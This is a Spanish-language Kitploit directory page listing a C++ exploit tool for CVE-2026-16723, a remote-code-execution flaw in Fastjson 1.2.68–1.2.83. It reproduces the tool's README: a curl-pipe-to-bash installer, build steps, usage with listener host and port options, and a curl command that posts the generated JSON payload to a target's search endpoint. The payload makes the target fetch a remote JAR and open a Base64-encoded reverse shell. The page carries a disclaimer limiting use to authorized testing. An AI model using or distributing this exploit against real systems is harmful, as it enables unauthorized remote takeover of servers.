Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-16723 — Una vulnerabilidad crítica que afecta a las versiones 1.2.68 – 1.2.83 de Fastjson. | Kitploit
Herramientas/GitHubGitHub/1xpwn/cve-2026-16723
Generación de PayloadsExplotaciónExplotación de Aplicaciones WebPruebas de Penetración
GitHub1xpwn/cve-2026-16723

CVE-2026-16723

Una vulnerabilidad crítica que afecta a las versiones 1.2.68 – 1.2.83 de Fastjson.

Ver Repositorio
2hace 20 díasAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Exploit de CVE-2026-16723

Una implementación independiente en C++17 para CVE-2026-16723, una vulnerabilidad crítica que afecta a Fastjson versiones 1.2.68 – 1.2.83.


Requisitos

  • Linux (o WSL en Windows)

  • Compilador compatible con C++17 (GCC 7+ o Clang 5+)

  • CMake 3.10 o superior

  • Paquetes del sistema:

    • libzip-dev
    • zlib1g-dev

Debian / Ubuntu

root@kitploit:~
sudo apt update
sudo apt install -y build-essential cmake libzip-dev zlib1g-dev

Instalación

Instalación rápida (recomendada)

Instala todo con un solo comando:

root@kitploit:~
curl -sSL https://raw.githubusercontent.com/yourusername/CVE-2026-16723/main/install.sh | bash

O descarga y ejecuta el instalador manualmente:

root@kitploit:~
wget https://raw.githubusercontent.com/yourusername/CVE-2026-16723/main/install.sh
chmod +x install.sh
./install.sh

El script de instalación hará lo siguiente:

  • Instalará todos los paquetes del sistema requeridos.

  • Descargará las librerías de solo cabecera requeridas:

    • nlohmann/json
    • cpp-httplib
  • Compilará el proyecto.

  • Colocará el binario compilado en el directorio actual como:

root@kitploit:~
./exploit

Compilación manual

Si clonaste el repositorio:

root@kitploit:~
git clone https://github.com/yourusername/CVE-2026-16723.git
cd CVE-2026-16723
./install.sh

O compila manualmente:

root@kitploit:~
mkdir build
cd build

cmake ..
make -j$(nproc)

cp exploit ../

Uso

Ejecuta el binario:

root@kitploit:~
./exploit --lhost <YOUR_IP> --lport <SHELL_PORT> [options]

Ejemplo

root@kitploit:~
./exploit --lhost 192.168.1.100 --lport 4444 --http-port 8000

Tras la ejecución se crearán los siguientes archivos:

root@kitploit:~
x
body.json

El servidor HTTP se iniciará en el puerto configurado (por defecto: 8000) y la herramienta esperará una conexión reverse shell entrante.


Envío del Payload

Envía el archivo body.json generado al endpoint vulnerable:

root@kitploit:~
curl -X POST http://<TARGET_IP>:8080/api/products/search \
     -H "Content-Type: application/json" \
     --data-binary @body.json

Si la aplicación espera un campo JSON diferente, especifícalo con la opción --field.


Opciones de línea de comandos


Archivos de salida

ArchivoDescripción
xPayload JAR generado
body.jsonPayload JSON para enviar al objetivo

Notas

  • Este proyecto está destinado únicamente a pruebas de seguridad autorizadas y fines educativos.
  • La implementación obliga a la aplicación objetivo a descargar y cargar un JAR remoto utilizando los protocolos jar:http y jar:file.
  • El comando de reverse shell está codificado en Base64 para reducir problemas de escape.

Sígueme en Twitter (X)

  • MNM
Descargar herramienta
OpciónDescripciónPor defecto
--lhostDirección IP localRequerido
--lportPuerto de escucha para reverse shell4444
--http-portPuerto del servidor HTTP8000
--firstPrimer descriptor de archivo a probar3
--lastÚltimo descriptor de archivo a probar30
--fieldNombre del campo JSONfacets
--outdirDirectorio de salida.
-h, --helpMuestra el mensaje de ayuda—